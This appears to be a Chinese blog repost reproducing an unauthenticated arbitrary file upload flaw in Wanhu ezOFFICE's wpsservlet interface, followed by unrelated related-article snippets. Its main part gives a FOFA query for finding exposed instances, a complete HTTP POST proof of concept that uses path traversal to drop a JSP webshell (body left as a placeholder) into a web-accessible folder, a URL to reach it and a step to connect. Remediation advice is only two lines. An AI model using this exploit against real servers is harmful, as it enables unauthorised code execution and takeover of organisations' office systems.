万户ezOFFICE wpsservlet任意文件上传漏洞复现

news2024/12/28 3:56:15

0x01 产品简介

 万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

 万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。

0x03 复现环境

FOFA:app="万户网络-ezOFFICE"

0x04 漏洞复现 

PoC

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=1&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip

--803e058d60f347f7b3c17fa95228eca6
Content-Disposition: form-data; name="NewFile"; filename="1.jsp"

马子
--803e058d60f347f7b3c17fa95228eca6--

上传马子

验证url

http://your-ip/defaultroot/platform/portal/layout/1.jsp

 

尝试连接 

0x05 修复建议

关闭互联网暴露面或接口处设置访问权限

打补丁或升级安全版本

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1271547.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【论文精读】HuggingGPT: Solving AI Tasks with ChatGPT and its Friends in Hugging Face

HuggingGPT: Solving AI Tasks with ChatGPT and its Friends in Hugging Face 前言Abstract1 Introduction2 Related Works3 HuggingGPT3.1 Task PlanningSpecification-based InstructionDemonstration-based Parsing 3.2 Model SelectionIn-context Task-model Assignment 3…

linux终端命令

comman [-options] [parameter] /主文件夹/视频 ls [-a -l -h] [Linux 路径] -a 全部文件显示 ,因为有些是隐藏的文件 -l 以列表的形式展示内容,展示更加细节 -h 以易于阅读的形式,列出文件大小,如K、M、G 混合使用: l…

数据挖掘实战-基于word2vec的短文本情感分析(文末送书)

🤵‍♂️ 个人主页:艾派森的个人主页 ✍🏻作者简介:Python学习者 🐋 希望大家多多支持,我们一起进步!😄 如果文章对你有帮助的话, 欢迎评论 💬点赞&#x1f4…

css新闻链接案例

利用html和css构建出新闻链接案例,使用渐变色做出背景色变化 background: linear-gradient(to bottom, rgb(137, 210, 251), rgb(238, 248, 254), white); 利用背景图片,调整位置完成 dd { height: 28px; line-height: 28px; background-image: url(./图…

网络周期间全球在线销售额飙升,提高排名是关键:7大策略速览

网络周期间(11月23-27日),全球在线销售额增长6%,达到2980亿美元,其中美国销售额708亿美元,增长5%。增长主要由订单量推动,消费者需求首次增长,寻求低价和便利。人工智能支持的无缝和…

共享办公室平台和普通品牌之间存在哪些区别?三个角度告诉你答案

共享办公室平台是一种新兴的办公模式,它与传统的办公品牌有很多不同之处,主要可以从以下几个角度进行分析: 空间使用:共享办公室平台是一种基于共享经济理念的办公方式,它将空间、设施、服务等资源进行整合和优化&…

Unity中Shader编译目标渲染器

文章目录 前言一、Unity在打包时,会把Shader编译成不同平台对应的代码我们在状态栏,可以看见我们目前所处于的目标平台 二、在Unity中,怎么指定目标平台1、#pragma only_renderers2、#pragma exclude_renderers 三、我们测试一下看看效果1、 …

陈年雷司令葡萄酒中的石油笔记

雷司令葡萄酒通常在年轻时食用,当它们酿造出果味和芳香的葡萄酒时,可能带有绿色或其他苹果、葡萄柚、桃子、醋栗、蜂蜜、玫瑰花或切绿草的香气,并且由于酸度高,通常味道清脆。 雷司令天然的高酸度和各种风味使其适合长时间老化&am…

行测空间展开图类型题目通法

国考《行测》空间展开图类型题目通法 摘要 本文介绍一种判断哪一种立体图形可以由空间展开图组成的通用方法。 方法 1.将给定的展开图重构为容易识别的上边一个方块,下边一个方块,中间一个方块条的形式。 姑且称之为十字形吧。 之所以重构成这种形…

Windows核心编程 远程线程注入

目录 线程安全 C线程 C STL线程 远程线程注入概述 相关API CreateRemoteThread LoadLibrary VirtualAllocEx FreeLibrary GetProcAddress 远程线程注入 DLL卸载 调试DLL 线程安全 变量在单线程和在多线程都不会出问题 - 线程安全 变量在多线程出问题&#xff0c…

java编程:给定⼀组正整数数组M,找出M数组中N项和为给定数S。如果有多对N项数字的和都等于 S,则输出N个数的乘积最⼩的哪⼀项,没有则返回空

题目: 编程题:给定⼀组正整数数组M,找出M数组中N项和为给定数S。如果有多对N项数字的和都等于 S,则输出N个数的乘积最⼩的哪⼀项,没有则返回空; 程序如下: 测试主程序: 先看下测试示…

WordPress定时文章自动发布技巧

对于许多WordPress站长来说,文章的管理和发布计划往往是一个头疼的问题。随着内容的不断增加,时间表的调整以及发布频率的把握成为了让人焦头烂额的挑战。 一、时间管理难题 对于博客管理员来说,时间管理一直是个令人困扰的问题。在忙碌的生…

flutter开发实战-readmore长文本展开和收缩控件

flutter开发实战-readmore长文本展开和收缩控件 当长文本展开和收缩控件,我们需要使用readmore来处理长文本展开和收缩,方便阅读 一、引入readmore 在工程的pubspec.yaml中引入插件 readmore: ^2.1.0ReadMoreText的属性如下 const ReadMoreText(this.…

Python之Appium 2自动化测试(Android篇)

一、环境搭建及准备工作 1、Appium 2 环境搭建 请参考另一篇文章: Windows系统搭建Appium 2 和 Appium Inspector 环境 2、安装 Appium-Python-Client,版本要求3.0及以上 pip install Appium-Python-ClientVersion: 3.1.03、手机连接电脑,并在dos窗口…

云融未来,安全内在—第七届云安全联盟大中华区大会将于12月21日在深圳举办

第七届云安全联盟大中华区大会 将于12月21日在深圳举办 大会主题 “云融未来,安全内在” 大会内容 ↓ ​ 大会背景 自2016年起,云安全联盟大中华区大会已成功举办六届,享誉国际,搭建了国内外政府机构、企业代表、专家学者等各方…

网站监控有什么作用?

科技改变生活,科技的发展让我们的生活越来越精彩丰富,数据中心机房监控系统也可以称为“自我监控系统”,主要是针对机房所有的设备及环境进行集中监控和管理的,其监控对象构成机房的各个子系统:动力系统、环境系统、消…

服务器500错误的解决思路

​服务器500错误是一个常见的错误代码,也就是服务器遇到了一个预料之外的错误,无法正常处理请求。这个错误通常是由于服务器配置错误、程序代码问题或者服务器资源不足等原因引起的。对于网站管理员和用户来说,服务器500错误则意味着网站无法…

计算机网络:应用层(下篇)

文章目录 前言一 、电子邮件(Email)1.邮件服务器2.SMTP[RFC 2821]3.邮件报文格式4.邮件访问协议 二、DNS(域名系统)1.DNS的历史2.DNS总体思路和目标(1)问题1:DNS名字空间(2&#xff…

APP测试的测试内容有哪些,常见的Bug分类介绍!

对于产品的手机项目(应用软件),主要是进行系统测试。而针对手机应用软件APP的系统测试,我们通常从如下几个角度开展:功能模块测试、兼容性测试、安装和卸载测试、软件更新测试、性能测试、用户体验性测试、交叉事件测试…

嵌入式常见的几种接口

嵌入式开发中,常见的外设通信接口/协议有SPI,I2C,UART三种,本文先分三个部分对SPI,I2C,UART进行介绍,最后对这三种协议进行比较。 1 SPI 1.1 SPI的简介 SPI(Serial Peripheral …